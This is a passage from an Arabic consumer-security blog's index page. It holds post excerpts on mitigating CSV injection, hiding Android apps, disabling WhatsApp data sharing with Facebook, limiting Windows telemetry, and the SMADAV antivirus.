 في الكود الموضح أعلاه يتم تعريف function تقوم بالتحقق من أول حرف من المدخل. إذا كان الحرف واحد من @، +، -، =، أو | يتم استخدام replace لتغيير أي | في الpayload ل |\. بعد ذلك يتم وضع الناتج بين علامتي ‘، و ذلك لعرض الpayload كنص بدلا من formula.

 إذا تم تشغيل الكود المذكور يصبح لدينا الناتج التالي:

تعرف على ثغرة CSV Injection و كيفية تفادي هذا النوع من الثغرات،

⁠⁠⁠في هذه التدوينة أحبتي في الله سنتعرف على ثغرة من ثغرات تطبيقات الويب التي تم اكتشافها سنة 2014 من طرف شركة contexte و التي تسمي بــ CSV ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

05‏/09‏/2016

نحن غالبا  نترك الهواتف في البيت أو في العمل دون حراصة او مراقبة ،أو قد يتم سرقتها، وهذا لا شك سوف يعرض هواتفنا للمتجسسين على أسرارنا ، وأحيانايطلب منك أحد الأصدقاء المقربين  أن يطلع على الهاتف كا فضول منه أو يريد أن يتعرف عنه ، وسوف يكون من المحرج أن تقول له لا لأنك لا ترغب أن يطلع أحد على معلوماتك الشخصية ، أو ربما تخاف أن يتم حذف التطبيقات التي توجد في سطح المكتب من طرف أحد ما.

العديد من الناس لهم هواتف الذكية بنظام الاندرويد، ولا شك أنهم يستعملون الهواتف بالدرجة الأولى لأنها أصبحت رفيق مدى الحياة ،ولأنها أصبحت رفيق مدى الحياة إلا أنها تقوم بتحميل العديد من التطبيقات والبرامج والتقاط الصور وتسجيل الفيديوهات ، وغالبا تكون هذه الأمور سرية بنسبة 60 في المئة بأنها تحتوي على أسرار عائلية أو شخصية ، ولهذا يجب أن تستعمل برنامج يخفي التطبيقات للاندوريد .
برنامج اخفاء التطبيقات للاندرويد سوف يغنيك من هذه المشاكل التي سوف تتعرض إليها ، التطبيق Hide App-Hide Application Icon  الذي تم اعطائه هو أن يخفي التطبيقات للاندوريد كي لا يتم حذفها أو الاطلاع عليها من طرف أشخاص آخرين

تحميل تطبيق

قم بإخفاء تطبيقات الأندرويد لحماية أسرارك العائلية أو الشخصية

نحن غالبا  نترك الهواتف في البيت أو في العمل دون حراصة او مراقبة ،أو قد يتم سرقتها، وهذا لا شك سوف يعرض هواتفنا للمتجسسين على أسرارنا ، وأح...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

27‏/08‏/2016

كنت قد تطرقت يوم أمس عن الإعلان الذي أعلنته مؤخراً شركة فايسبوك بخصوص تطبيق الواتس اب حيث أنه سيتم مشاركة بعض البيانات الخاصة بك في موقع الفيسبوك ومن بين هذه البيانات رقم الهاتف الخاص بك الذي تستعمله للدردشة مع أرقام أخرى، طبعاً هذا الأمر قد يضر بخصوصية المستخدم لهذا اليوم جئتكم بطريقة لكيفية إيقاف هذا الأمر فكما نعلم أن مدونة عالم الحماية لا تبخل عليكم و تشارككم حلول جل المشاكل المتعلقة بعالم الإعلاميات.


والخطير في هذا أن الهواتف الذكيةأصبحت تتلقى إحدى شروط وقوانين التحديث حيث يطلب منك تطبيق الواتساب الموافقة عليها ثم استعمال التطبيق، لهذا إذ كنت وافقت على هذه الشروط التي تظهر في الصورة أسفله والذي تشير إلى أنه سيتم مشاركة بعض المعلومات الخاصة بك ومن بينها رقم هاتفك فعليك عزيزي القارئ اتباع الخطوات التي سأشرحها لك لإيقاف هذا الأمر.
إذن لإلغاء هذا الأمر ما عليك سوى تتبع هذه الخيارات التالية:
التوجه أولا إلى WhatsApp Settings
ثم إلى  Accounts
ثم بعد ذلك قم بإزالة علامة صح على خيار  Share My Account Info كما هو مبين في الصورة أسفله
أما إذا كنت تستعمل اللغة الفرنسية فــعليك :
التوجه أولا إلى Paramètres
ثم إلى Mon Compte
ثم بعد ذلك قم بإزالة علامة صح على خيار  Share Mon compte d'info كما هو مبين في الصورة أسفله
و مبروك عليك عزيزي لقد قمت بحماية بيانتك بعدم مشاركتها على الفيسبوك 
أما بالنسبة للإخوان الذين لم تصلهم الرسالة بعد أو لم يقوموا بتحديث تطبيق الواتس اب فلن يجدوا خيار Share My Account Info 

جد هام !! ما سر هذه الرسالة و كيف أحمي نفسي من هذا

كنت قد تطرقت يوم أمس عن الإعلان الذي أعلنته مؤخراً شركة فايسبوك بخصوص تطبيق الواتس اب حيث أنه سيتم مشاركة بعض البيانات الخاصة بك في موقع ال...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,

26‏/08‏/2016

كلنا نعلم أن شركة فيسبوك هي المالكة لتطبيق التراسل الفوري واتس آب، وهي دائما ما تحدثنا عن احترامها لخصوصية المستخدمين على خدماتها المختلفة، لكنها اليوم وبعد اتخادها لهذا القرار الجديد الذي ربما يثير غضب المستخدمين و لن ينال رضاهم أبدا، لأن تطبيق الدردشة واتس آب الذي أصبح تابع لموقع التواصل الاجتماعي فيسبوك أشار يوم أمس على موقه الرسمي عن تحديثه الجديد في سياسته للخصوصية، حيث أشار أنه سيقوم بمشاركة البيانات الشخصية لمستخدمي واتس آب على فيسبوك، و هذا الأمر أثار الكثير من الاستياء بين المستخدمين الذين اعتبروه خرقا في منظومة حماية الحياة الشخصية و التي تدعي فيسبوك احترامها.




وقد كشف بيان التطبيق أن المعلومات الخاصة بالمستخدمين الذي سيبدأ واتس آب بمشاركتها مع موقع فيسبوك تتعلق بالأساس بالرقم الهاتفي للمستخدم، و أشارت أن السبب الرئيسي لهذه الخطوة هو محاربة ظاهرة الرسائل الاحتيالية المزعحة "سبام" إضافة إلى هذا تقوية الروابط بين المستخدمين أيضا و خدمات أخرى تشكل أهمية لهم كالبنوك أو شركات الطيران و التي قد تحتاج هذه المعلومات في حالة الضرورة القصوى، و أشارت أن فيسبوك لن تقوم بمشاركة هذه معطيات لأغراض إعلانية.

قرار خطير تتخذه فيسبوك بشأن واتس آب(مشاركة بياناتك الشخصية على الفيسبوك)

كلنا نعلم أن شركة فيسبوك هي المالكة لتطبيق التراسل الفوري واتس آب، وهي دائما ما تحدثنا عن احترامها لخصوصية المستخدمين على خدماتها المختلفة...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: , ,

09‏/08‏/2016

لا بد أنك قد اندهشت قليلا من عنوان درسنا اليوم لكن الحقيقة التي يغفل عنها أغلب المستخدمين هي أنه حقا شركة مايكروسوفت تتجسس عليك و ذلك من خلال نظام التشغيل ويندوز التابع لها ، حيث أنها تقوم بالتجسس و تتبع خطوات مستخدميها على الحاسوب عن طريق نظام التشغيل ويندوز دون أن تعلم أنت بذلك ، لهذا في هذا الشرح سوف نتعرف معا على كيفية منع مايكروسوفت من التجسس على حاسوبك .




قد يخطر في بالك أن منع مايكروسوفت من التجسس على الويندوز الخاص بك أمر غير مهم ، لكنه في حقيقة الأمر هو بالغ الأهمية ، حيث أنك في كل مرة تقوم فيها بتشغيل حاسوبك الخاص و الإتصال بالأنترنت فإن الكمبيوتر يقوم و بشكل تلقائي بالإتصال مع سيرفر مايكروسوفت و إرسال سجلات تحتوي على معلومات عنك و تتبع كل ما تقوم به على حاسوبك الشخصي


و لكي تمنع مايكروسوفت من التجسس عليك و أخد جميع بياناتك إليك هذه الخطوات التي يجب القيام بها, تابع معي الشرح بالفيديو أخي الكريم






الآن مبروك عليك لأنك بعد أن قمت بهذه الخطوات فأنت قد منعت مايكروسوفت من التجسس عليك تماما

شركة مايكروسوفت تتجسس عليك كيف تمنعها من ذلك

لا بد أنك قد اندهشت قليلا من عنوان درسنا اليوم لكن الحقيقة التي يغفل عنها أغلب المستخدمين هي أنه حقا شركة مايكروسوفت تتجسس عليك و ذلك من خ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: , ,

15‏/07‏/2016


   نبدة عن البرنامج                                                                                              كما جرت العادة تقدم لكم مدونة عالم الحماية احدت برنامج لمقاومة الفيروسات تحت اسم SMADAV و يتميز هدا البرنامج عن غيره بقدرته على اضهار الملفات المخفية جراء اتعرضها  لشتى انواع الفيروسات الفيرو سات

مزايا البرنامج

       والجميل في هدا البرنامج قدرته على الوصول الى جميع قطاعات الكمبيوتر وعمل SCAN اي البحت عن الفيروسات و مباشرة  عملية القضاء عليها  بالاضافة الى كون البرنامج  مجاني زد على دلك سعة البرنامج المتمتلة في 1,2M كما ام البرنامج ينافس اشهر مضاضات الفيروسات ك برنامج AVAST وAVIRA بل يفوقها فاعلية بحيت تجد في هدا البرنامج المدكور ما لايوجد في متيلاته من البرامج الاخرى ك توفره على قاعدة بيانات مهمة للفيروسات و قدرته على العمل بكامل قدراته دون الحاجة للا تصال  بالانترنيت او التحديت ويعمل بشكل تلقائي فعند  كشفه لفيروس يقوم بمسحه على الفور

طريقة عمل البرنامج

عند تتبيت البرنامج يبدا بعملية scan على الشكل التالي 


    

عند وجود اي فاي وس تدهر النافدة التالية


عند عمل scan يدوي تدهر النافدة التالية 



اقوى برنامج لمكافحة للفيروسات

   نبدة عن البرنامج                                                                                               كما جرت العادة ...
في اقراء المزيد
ليست هناك تعليقات:
التسميات: ,
الاشتراك في: الرسائل (Atom)

عن المدونة

موقع عالم الحماية هو عبارة عن مشروع عربي متخصص في مجال الأمن المعلوماتي وأخبار الهاكرز وجميع أخبار الإختراقات المحلية أو الدولية ، وكذا مهتمين باكتشاف التغرات الأمنية والبرمجية ، ناهيك عن ذلك حيث سيقدم العديد من الدروس التعليمية في ميدان الهاكينغ الأخلاقي ، والميكانيزمات المعتمدة دوليا بالنسبة لمستشاري الأمن المعلوماتي ، هدفنا في هذا المشروع هو تعزيز ثقافة الحماية المعلوماتية لدى سكان العالم العربي وإمدادهم بالعديد من الأساليب المتقدمة والجديدة كلياء، حيث سنقوم بتغطية الأحداث المتعلقة بالتكنلوجيا والتقنيات ، وهذا كله لإغناء المحتوى العربي في هذا المجال ! هدفنا تعليمي وليس لدينا أي علاقة بأي جهة غير أخلاقية !.